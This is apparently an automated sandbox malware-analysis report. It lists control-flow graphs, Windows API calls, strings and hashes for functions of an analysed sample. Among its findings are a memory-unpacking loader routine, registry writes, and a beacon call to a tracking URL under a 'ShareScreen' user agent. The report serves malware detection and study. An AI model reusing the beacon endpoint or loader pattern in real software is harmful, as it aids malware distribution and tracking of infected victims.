                                                                                                                                                                                                                                                  control_flow_graph 74 43d02c-43d05c call 43cd8f 77 43d077-43d083 call 43976e 74->77 78 43d05e-43d069 call 42eaa6 74->78 83 43d085-43d09a call 42eaa6 call 42eab9 77->83 84 43d09c-43d0e5 call 43ccfa 77->84 85 43d06b-43d072 call 42eab9 78->85 83->85 94 43d152-43d15b GetFileType 84->94 95 43d0e7-43d0f0 84->95 92 43d34e-43d354 85->92 96 43d1a4-43d1a7 94->96 97 43d15d-43d18e GetLastError call 42ea83 CloseHandle 94->97 99 43d0f2-43d0f6 95->99 100 43d127-43d14d GetLastError call 42ea83 95->100 103 43d1b0-43d1b6 96->103 104 43d1a9-43d1ae 96->104 97->85 111 43d194-43d19f call 42eab9 97->111 99->100 105 43d0f8-43d125 call 43ccfa 99->105 100->85 108 43d1ba-43d208 call 4396b7 103->108 109 43d1b8 103->109 104->108 105->94 105->100 116 43d20a-43d216 call 43cf0b 108->116 117 43d218-43d23c call 43caad 108->117 109->108 111->85 116->117 123 43d240-43d24a call 4335bd 116->123 124 43d24f-43d292 117->124 125 43d23e 117->125 123->92 127 43d2b3-43d2c1 124->127 128 43d294-43d298 124->128 125->123 131 43d2c7-43d2cb 127->131 132 43d34c 127->132 128->127 130 43d29a-43d2ae 128->130 130->127 131->132 133 43d2cd-43d300 CloseHandle call 43ccfa 131->133 132->92 136 43d302-43d32e GetLastError call 42ea83 call 439880 133->136 137 43d334-43d348 133->137 136->137 137->132
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0043CCFA: CreateFileW.KERNEL32(00000000,00000000,?,0043D0D5,?,?,00000000,?,0043D0D5,00000000,0000000C), ref: 0043CD17
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0043D140
                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0043D147
                                                                                                                                                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 0043D153
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0043D15D
                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0043D166
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0043D186
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0043D2D0
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0043D302
                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0043D309
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                  • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                                                  • Instruction ID: 76b590644e61a1e30ee63bf02a6fb5b1311e46919e71f325493a9cd527e13796
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09A14732E101049FDF19AF68EC917AE7BB1AF0A324F14115EE815AB3D1D7389D12CB5A

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 142 432f19-432f29 143 432f43-432f45 142->143 144 432f2b-432f3e call 42eaa6 call 42eab9 142->144 146 432f4b-432f51 143->146 147 4332ad-4332ba call 42eaa6 call 42eab9 143->147 160 4332c5 144->160 146->147 150 432f57-432f82 146->150 165 4332c0 call 42a58d 147->165 150->147 153 432f88-432f91 150->153 156 432f93-432fa6 call 42eaa6 call 42eab9 153->156 157 432fab-432fad 153->157 156->165 158 432fb3-432fb7 157->158 159 4332a9-4332ab 157->159 158->159 163 432fbd-432fc1 158->163 164 4332c8-4332cd 159->164 160->164 163->156 167 432fc3-432fda 163->167 165->160 170 432ff7-433000 167->170 171 432fdc-432fdf 167->171 175 433002-433019 call 42eaa6 call 42eab9 call 42a58d 170->175 176 43301e-433028 170->176 173 432fe1-432fe7 171->173 174 432fe9-432ff2 171->174 173->174 173->175 179 433093-4330ad 174->179 208 4331e0 175->208 177 43302a-43302c 176->177 178 43302f-43304d call 433697 call 43345a * 2 176->178 177->178 212 43306a-433090 call 4347de 178->212 213 43304f-433065 call 42eab9 call 42eaa6 178->213 181 4330b3-4330c3 179->181 182 433181-43318a call 43d355 179->182 181->182 185 4330c9-4330cb 181->185 195 4331fd 182->195 196 43318c-43319e 182->196 185->182 189 4330d1-4330f7 185->189 189->182 193 4330fd-433110 189->193 193->182 198 433112-433114 193->198 200 433201-433219 ReadFile 195->200 196->195 201 4331a0-4331af GetConsoleMode 196->201 198->182 203 433116-433141 198->203 205 433275-433280 GetLastError 200->205 206 43321b-433221 200->206 201->195 207 4331b1-4331b5 201->207 203->182 211 433143-433156 203->211 214 433282-433294 call 42eab9 call 42eaa6 205->214 215 433299-43329c 205->215 206->205 216 433223 206->216 207->200 209 4331b7-4331d1 ReadConsoleW 207->209 210 4331e3-4331ed call 43345a 208->210 217 4331d3 GetLastError 209->217 218 4331f2-4331fb 209->218 210->164 211->182 222 433158-43315a 211->222 212->179 213->208 214->208 219 4332a2-4332a4 215->219 220 4331d9-4331df call 42ea83 215->220 226 433226-433238 216->226 217->220 218->226 219->210 220->208 222->182 229 43315c-43317c 222->229 226->210 233 43323a-43323e 226->233 229->182 234 433240-433250 call 432c35 233->234 235 433257-433262 233->235 247 433253-433255 234->247 241 433264 call 432d85 235->241 242 43326e-433273 call 432a75 235->242 248 433269-43326c 241->248 242->248 247->210 248->247
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                                                                                                                                                                  • Instruction ID: 8b8381e38334751f3c5fee40e88eacdf1446f1079df49a385922c4ea532b4e29
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CC10670E04345AFDF11DFA9D841BAEBBB0BF0D305F14519AE805A7392C7789A41CB69

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 250 210003c-2100047 251 2100049 250->251 252 210004c-2100263 call 2100a3f call 2100e0f call 2100d90 VirtualAlloc 250->252 251->252 267 2100265-2100289 call 2100a69 252->267 268 210028b-2100292 252->268 273 21002ce-21003c2 VirtualProtect call 2100cce call 2100ce7 267->273 270 21002a1-21002b0 268->270 272 21002b2-21002cc 270->272 270->273 272->270 279 21003d1-21003e0 273->279 280 21003e2-2100437 call 2100ce7 279->280 281 2100439-21004b8 VirtualFree 279->281 280->279 282 21005f4-21005fe 281->282 283 21004be-21004cd 281->283 286 2100604-210060d 282->286 287 210077f-2100789 282->287 285 21004d3-21004dd 283->285 285->282 292 21004e3-2100505 LoadLibraryA 285->292 286->287 293 2100613-2100637 286->293 290 21007a6-21007b0 287->290 291 210078b-21007a3 287->291 294 21007b6-21007cb 290->294 295 210086e-21008be LoadLibraryA 290->295 291->290 296 2100517-2100520 292->296 297 2100507-2100515 292->297 298 210063e-2100648 293->298 299 21007d2-21007d5 294->299 302 21008c7-21008f9 295->302 300 2100526-2100547 296->300 297->300 298->287 301 210064e-210065a 298->301 303 2100824-2100833 299->303 304 21007d7-21007e0 299->304 305 210054d-2100550 300->305 301->287 306 2100660-210066a 301->306 307 2100902-210091d 302->307 308 21008fb-2100901 302->308 314 2100839-210083c 303->314 309 21007e2 304->309 310 21007e4-2100822 304->310 311 21005e0-21005ef 305->311 312 2100556-210056b 305->312 313 210067a-2100689 306->313 308->307 309->303 310->299 311->285 315 210056d 312->315 316 210056f-210057a 312->316 317 2100750-210077a 313->317 318 210068f-21006b2 313->318 314->295 319 210083e-2100847 314->319 315->311 321 210059b-21005bb 316->321 322 210057c-2100599 316->322 317->298 323 21006b4-21006ed 318->323 324 21006ef-21006fc 318->324 325 2100849 319->325 326 210084b-210086c 319->326 333 21005bd-21005db 321->333 322->333 323->324 327 210074b 324->327 328 21006fe-2100748 324->328 325->295 326->314 327->313 328->327 333->305
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0210024D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                  • Instruction ID: aad6ab16f8a28cd0eb1489dbc57eebdc88624be26de041bf3cadf3bec6a1f088
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4525974A01229DFDB64CF58C984BACBBB1BF09304F1580E9E54DAB391DB70AA95CF14

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C1D
                                                                                                                                                                                                                                                    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                                                                                                                                    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                                                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E30
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00402E41
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00402E44
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleOpen_wcslen
                                                                                                                                                                                                                                                  • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                                                  • API String ID: 3067768807-1501832161
                                                                                                                                                                                                                                                  • Opcode ID: d6968632f8314940c7590e74f8d6b13d86a5e442bc38550d54e55658f4f001bc
                                                                                                                                                                                                                                                  • Instruction ID: 38c4ea95430cb0d064a2c81279cd8101482ed185274a1110c797b87c00f11b19
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6968632f8314940c7590e74f8d6b13d86a5e442bc38550d54e55658f4f001bc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C517095A65344A9E320EBB0BC46B3633B8FF58712F10543BE518CB2F2E7B49944875E

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1687354797-0
                                                                                                                                                                                                                                                  • Opcode ID: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                                                                                                                                                                                                  • Instruction ID: ef80ad8abc8d01ee6ed88eea47d540721f1d2954bb97cc6dce8e21ba99fc2e21
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB215172C042489ADF15EBF5D8417DEB7F8AF08318F54407FE400B62C1DB7D89448A69

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Cnd_initX.LIBCPMT ref: 00405812
                                                                                                                                                                                                                                                  • __Cnd_signal.LIBCPMT ref: 0040581E
                                                                                                                                                                                                                                                  • std::_Cnd_initX.LIBCPMT ref: 00405833
                                                                                                                                                                                                                                                  • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 0040583A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2059591211-0
                                                                                                                                                                                                                                                  • Opcode ID: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                                                                                                                                                                                                  • Instruction ID: aebd2ac95218272d728fe4b8aabd0d06745c53d3a4d3bf2acc4ab23466c53149
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FF082324007009BE7313772C80770A77A0AF04319F54883EF456769E2DBBEA8585A5D

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 415 402956-4029c1 call 426820 call 42a33b call 42b444 call 402819 424 4029c3-4029c6 415->424 425 4029cf-4029e9 call 404329 call 40f8c5 415->425 424->425 426 4029c8-4029cc 424->426 426->425 428 4029ce 426->428 428->425
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00402985
                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00402995
                                                                                                                                                                                                                                                    • Part of subcall function 00402819: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004028FC
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                                                                                                                                                                                  • String ID: +@
                                                                                                                                                                                                                                                  • API String ID: 2843524283-4068139069
                                                                                                                                                                                                                                                  • Opcode ID: c4372d71d1af2a683dbfcdd1665cb533e7f75167211033e386056ce4ddc1eda8
                                                                                                                                                                                                                                                  • Instruction ID: 360ce0a8eae9c999d09f2756f3db8bce049cda3fb2da0c45bd643548fbd10a56
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c4372d71d1af2a683dbfcdd1665cb533e7f75167211033e386056ce4ddc1eda8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F901D6B1E0011C5ADB24EA25ED46AEF77689B41308F1401BBA605E31C1D9785E45CA99

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
                                                                                                                                                                                                                                                  • ExitThread.KERNEL32 ref: 0042DFCA
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                                  • String ID: <(@
                                                                                                                                                                                                                                                  • API String ID: 1611280651-4189137628
                                                                                                                                                                                                                                                  • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                                                                                                                                                                  • Instruction ID: e0787552ab8efb8db6d324a59155cd7370fffab00d3424d568e81b2c5b813918
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7EF0A471A00614AFDB04EFB1D80AA6D3B70FF09715F10056AF40257292CB7969558B68

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 452 42e104-42e10f 453 42e111-42e123 call 42eab9 call 42a58d 452->453 454 42e125-42e138 call 42e0bb 452->454 466 42e175-42e178 453->466 460 42e166 454->460 461 42e13a-42e157 CreateThread 454->461 465 42e168-42e174 call 42e02d 460->465 463 42e179-42e17e 461->463 464 42e159-42e165 GetLastError call 42ea83 461->464 469 42e180-42e183 463->469 470 42e185-42e187 463->470 464->460 465->466 469->470 470->465
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(?,?,Function_0002DFB0,00000000,?,?), ref: 0042E14D
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,0040CF04,00000000,00000000,?,?,00000000,?), ref: 0042E159
                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0042E160
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2744730728-0
                                                                                                                                                                                                                                                  • Opcode ID: 7111d36ae7d9c15de437581cc3a8b466686a4c726987840fc25d61e653133f3e
                                                                                                                                                                                                                                                  • Instruction ID: 0446f91cba5bc1877a5460ce95bae766c471c3d01d015a917539d7ef00797947
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7111d36ae7d9c15de437581cc3a8b466686a4c726987840fc25d61e653133f3e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF01D236600139BBDB119FA3FC05AAF7B6AEF85720F40003AF80582210DB358D21C7A9

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 473 434745-43475d call 439911 476 434770-434786 SetFilePointerEx 473->476 477 43475f-434764 call 42eab9 473->477 478 434797-4347a1 476->478 479 434788-434795 GetLastError call 42ea83 476->479 483 43476a-43476e 477->483 482 4347a3-4347b8 478->482 478->483 479->483 485 4347bd-4347c2 482->485 483->485
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDCB,00000000,00000002,0040DDCB,00000000,?,?,?,004347F4,00000000,00000000,0040DDCB,00000002), ref: 0043477E
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,004347F4,00000000,00000000,0040DDCB,00000002,?,0042C151,?,00000000,00000000,00000001,?,0040DDCB,?,0042C206), ref: 00434788
                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0043478F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2336955059-0
                                                                                                                                                                                                                                                  • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                                                                                                                                                                  • Instruction ID: 754c6ade6be4612c7e0c4d55d151f31ddb378772f23eed9c1438f533fa7de6e2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92012836710114ABDB159FAADC058EE7B2AEFCA721F24020AF81597290EB74ED528794

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 487 402ba3-402bcf RegCreateKeyExW 488 402bd1-402be3 RegSetValueExW 487->488 489 402be5-402be8 487->489 488->489 490 402bf3-402bf9 489->490 491 402bea-402bed RegCloseKey 489->491 491->490
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BC5
                                                                                                                                                                                                                                                  • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BDD
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BED
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseCreateValue
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1818849710-0
                                                                                                                                                                                                                                                  • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                                                                                                                                                                  • Instruction ID: 504cdbf1e8d79b6d7283afc99896261950e1a919ac783b79018d19fe3f3d7e53
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16F0B4B650011CFFEB214F94DD89DABBA7CEB047E9F100175FA01B2150D6B19E009664

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 492 42e064-42e071 call 431f4e 495 42e073-42e076 ExitThread 492->495 496 42e07c-42e084 492->496 496->495 497 42e086-42e08a 496->497 498 42e091-42e097 497->498 499 42e08c call 4354e6 497->499 501 42e0a4-42e0aa 498->501 502 42e099-42e09b 498->502 499->498 501->495 504 42e0ac-42e0ae 501->504 502->501 503 42e09d-42e09e CloseHandle 502->503 503->501 504->495 505 42e0b0-42e0ba FreeLibraryAndExitThread 504->505
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00431F4E: GetLastError.KERNEL32(?,?,?,0042EABE,00434D6C,?,00431EF8,00000001,00000364,?,0042DFD5,00457910,00000010), ref: 00431F53
                                                                                                                                                                                                                                                    • Part of subcall function 00431F4E: _free.LIBCMT ref: 00431F88
                                                                                                                                                                                                                                                    • Part of subcall function 00431F4E: SetLastError.KERNEL32(00000000), ref: 00431FBC
                                                                                                                                                                                                                                                  • ExitThread.KERNEL32 ref: 0042E076
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,0042E196,?,?,0042E00D,00000000), ref: 0042E09E
                                                                                                                                                                                                                                                  • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E196,?,?,0042E00D,00000000), ref: 0042E0B4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1198197534-0
                                                                                                                                                                                                                                                  • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                                                                                                                                                                  • Instruction ID: fd9bad38e730a393213bf68ec19d44fd98ecce05ba50bc9e79acb20fd3a4735a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CF05E342006347BEB319F37EC08A5B7A98AF05725F584756B924C22A1DBBCDD82869C

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 506 402394-4023a2 507 402557-402559 PostQuitMessage 506->507 508 4023a8-4023ad 506->508 509 40255f-402564 507->509 510 4023c6-4023cd 508->510 511 4023af-4023c1 DefWindowProcW 508->511 512 4023d4-4023db 510->512 513 4023cf call 401d9a 510->513 511->509 512->509 514 4023e1-402555 call 4010ba call 4029ea 512->514 513->512 514->509
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 004023BB
                                                                                                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00402559
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: MessagePostProcQuitWindow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3873111417-0
